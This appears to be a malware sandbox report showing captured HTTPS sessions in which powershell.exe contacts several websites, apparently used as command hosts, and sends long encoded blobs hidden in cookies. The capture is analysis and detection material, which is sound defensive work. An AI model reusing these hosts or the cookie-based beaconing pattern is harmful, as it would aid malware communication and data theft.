                                                    2024-12-18 10:20:57 UTC1941INData Raw: 3a 7b 22 70 61 67 65 22 3a 5b 5d 2c 22 65 64 69 74 6f 72 50 72 65 66 65 72 65 6e 63 65 73 22 3a 5b 5d 7d 2c 22 6b 69 74 22 3a 7b 22 61 63 74 69 76 65 5f 62 72 65 61 6b 70 6f 69 6e 74 73 22 3a 5b 22 76 69 65 77 70 6f 72 74 5f 6d 6f 62 69 6c 65 22 2c 22 76 69 65 77 70 6f 72 74 5f 74 61 62 6c 65 74 22 5d 2c 22 67 6c 6f 62 61 6c 5f 69 6d 61 67 65 5f 6c 69 67 68 74 62 6f 78 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 63 6f 75 6e 74 65 72 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 66 75 6c 6c 73 63 72 65 65 6e 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 7a 6f 6f 6d 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 73 68 61 72 65 22 3a 22 79 65
                                                    Data Ascii: :{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"ye


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.11.204973467.205.27.2494438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:21:09 UTC2263OUTGET /wordpress/ HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: www.anifowoshe.com
                                                    Connection: Close
                                                    2024-12-18 10:21:11 UTC328INHTTP/1.1 500 Internal Server Error
                                                    Date: Wed, 18 Dec 2024 10:21:09 GMT
                                                    Server: Apache
                                                    Vary: Accept-Encoding,Cookie,User-Agent
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Upgrade: h2
                                                    Connection: Upgrade, close
                                                    Content-Length: 2743
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:21:11 UTC2743INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 57 6f 72 64
                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><meta name='robots' content='max-image-preview:large, noindex, follow' /><title>Word


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.11.2049735104.21.10.2244431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:21:18 UTC2246OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: alseraj.net
                                                    Connection: Close
                                                    2024-12-18 10:21:18 UTC834INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:21:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Wed, 18 Dec 2024 09:38:26 GMT
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AnkJw4RYbOkxgnnItMqtY2dLrSCAlkhAq1imjXSiIkd21xvaPgpDZSZaXQbXLCyYhSsnQxSWWWXtQz%2FXLX37HYbQBclX0tdQskyaskik3wJjDvM65qnqi%2BgfvHOJ1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e6cdce822ed7e-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141458&min_rtt=141360&rtt_var=29982&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2865&delivery_rate=27023&cwnd=252&unsent_bytes=0&cid=2a8f76add53bb3e2&ts=882&x=0"
                                                    2024-12-18 10:21:18 UTC535INData Raw: 37 64 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 61 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65
                                                    Data Ascii: 7d3b<!DOCTYPE html><html dir="rtl" lang="ar" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <style>img:is([size
                                                    2024-12-18 10:21:18 UTC1369INData Raw: 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b4 d8 a8 d9 83 d8 a9 20 d8 a7 d9 84 d8 b3 d8 b1 d8 a7 d8 ac 20 d9 81 d9 8a 20 d8 a7 d9 84 d8 b7 d8 b1 d9 8a d9 82 20 d8 a7 d9 84 d9 89 20 d8 a7 d9 84 d9 84 d9 87 d8 9b 20 d9 85 d9 88 d9 82 d8 b9 20 d8 ab d9 82 d8 a7 d9 81 d9 8a d8 8c 20 d8 a5 d8 b9 d9 84 d8 a7 d9 85 d9 8a 20 d9 88 d8 aa d8 a8 d9 84 d9 8a d8 ba d9 8a d8 8c 20 d9 8a d9 87 d8 af d9 81 20 d9 84 d9 86 d8 b4 d8 b1 20 d9 85 d8 b9 d8 a7 d8 b1 d9 81 20 d8 a7 d9 84 d8 a5 d8 b3 d9 84 d8 a7 d9 85 20 d8 a7 d9 84 d9 85 d8 ad d9 85 d9 91 d8 af d9 8a 20 d9 88 d8 aa d8 b1 d9 88 d9 8a d8 ac 20 d8 a7 d9 84 d8 ab d9 91 d9 82 d8 a7 d9 81 d8 a9 20 d8 a7 d9 84 d8 af d9 91 d9 8a d9 86 d9 8a d9 91
                                                    Data Ascii: le><meta name="description" content="
                                                    2024-12-18 10:21:18 UTC1369INData Raw: d8 b1 d8 a7 d8 ac 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 70 64 61 74 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32 36 3a 32 37 2b 30 33 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 73 65 63 75 72 65 5f 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65
                                                    Data Ascii: " /><meta property="og:updated_time" content="2024-12-18T10:26:27+03:00" /><meta property="og:image" content="https://alseraj.net/wp-content/uploads/2023/01/alseraj.jpg" /><meta property="og:image:secure_url" content="https://alseraj.net/wp-conte
                                                    2024-12-18 10:21:18 UTC1369INData Raw: 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 83 d9 8f d8 aa d8 a8 20 d8 a8 d9 88 d8 a7 d8 b3 d8 b7 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 73 65 72 61 64 6f 74 74 69 6e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 32 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 85 d8 af d8 a9 20 d8 a7 d9 84 d9 82 d8 b1 d8 a7 d8 a1 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 32 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                    Data Ascii: p-content/uploads/2023/01/alseraj.jpg" /><meta name="twitter:label1" content=" " /><meta name="twitter:data1" content="seradottin" /><meta name="twitter:label2" content=" " /><meta name="twitter:data2" content="
                                                    2024-12-18 10:21:18 UTC1369INData Raw: 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 33 5c 75 30 36 33 31 5c 75 30 36 32 37 5c 75 30 36 32 63 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 23 70 65 72 73 6f 6e 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69
                                                    Data Ascii: \u0629 \u0627\u0644\u0633\u0631\u0627\u062c","publisher":{"@id":"https://alseraj.net/#person"},"inLanguage":"ar","potentialAction":{"@type":"SearchAction","target":"https://alseraj.net/?s={search_term_string}","query-input":"required name=search_term_stri
                                                    2024-12-18 10:21:18 UTC1369INData Raw: 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 2e 67 72 61 76 61 74 61 72 2e 63 6f 6d 2f 61 76 61 74 61 72 2f 66 63 31 32 62 65 39 35 37 63 65 62 39 32 39 32 32 61 32 32 39 64 63 37 61 37 31 63 61 38 30 30 3f 73 3d 39 36 26 61 6d 70 3b 64 3d 62 6c 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 63 61 70 74 69 6f 6e 22 3a 22 73 65 72 61 64 6f 74 74 69 6e 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 7d 2c 22 73 61 6d 65 41 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 61 62 69 62 61 6c 6b 61 7a 65 6d 69 2e 63 6f 6d 22 5d 7d 2c 7b 22 68 65 61 64 6c 69 6e 65 22 3a 22 5c 75 30 36 33 34 5c 75 30 36 32 38 5c 75 30 36 34 33 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33
                                                    Data Ascii: ank&amp;r=g","url":"https://secure.gravatar.com/avatar/fc12be957ceb92922a229dc7a71ca800?s=96&amp;d=blank&amp;r=g","caption":"seradottin","inLanguage":"ar"},"sameAs":["https://www.habibalkazemi.com"]},{"headline":"\u0634\u0628\u0643\u0629 \u0627\u0644\u063
                                                    2024-12-18 10:21:18 UTC1369INData Raw: 75 30 36 34 35 5c 75 30 36 32 34 5c 75 30 36 34 34 5c 75 30 36 35 31 5c 75 30 36 34 31 5c 75 30 36 32 37 5c 75 30 36 32 61 20 5c 75 30 36 33 33 5c 75 30 36 34 35 5c 75 30 36 32 37 5c 75 30 36 32 64 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 34 5c 75 30 36 35 31 5c 75 30 36 34 61 5c 75 30 36 32 65 20 5c 75 30 36 32 64 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 38 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 34 33 5c 75 30 36 32 37 5c 75 30 36 33 38 5c 75 30 36 34 35 5c 75 30 36 34 61 2e 22 2c 22 64 61 74 65 50 75 62 6c 69 73 68 65 64 22 3a 22 32 30 32 32 2d 30 32 2d 30 36 54 30 31 3a 34 30 3a 30 31 2b 30 33 3a 30 30 22 2c 22 64 61 74 65 4d 6f 64 69 66 69 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32
                                                    Data Ascii: u0645\u0624\u0644\u0651\u0641\u0627\u062a \u0633\u0645\u0627\u062d\u0629 \u0627\u0644\u0634\u0651\u064a\u062e \u062d\u0628\u064a\u0628 \u0627\u0644\u0643\u0627\u0638\u0645\u064a.","datePublished":"2022-02-06T01:40:01+03:00","dateModified":"2024-12-18T10:2
                                                    2024-12-18 10:21:18 UTC1369INData Raw: 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28
                                                    Data Ascii: e\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/alseraj.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(
                                                    2024-12-18 10:21:18 UTC1369INData Raw: 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74
                                                    Data Ascii: equently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                                    2024-12-18 10:21:18 UTC1369INData Raw: 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f
                                                    Data Ascii: ts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemo


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.11.204973666.198.240.434438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:21:31 UTC2245OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: werrrk.com
                                                    Connection: Close
                                                    2024-12-18 10:21:32 UTC255INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:21:32 GMT
                                                    Content-Length: 11752
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    cf-edge-cache: no-cache
                                                    Server: imunify360-webshield/1.21
                                                    2024-12-18 10:21:32 UTC11752INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 0a 2e 73 70 69 6e 6e 65 72 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf8"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <link rel="icon" href="data:,"> <title>One moment, please...</title> <style> .spinner { -webkit-animati


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.11.2049737197.189.243.2124431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:21:40 UTC2255OUTGET / HTTP/1.1
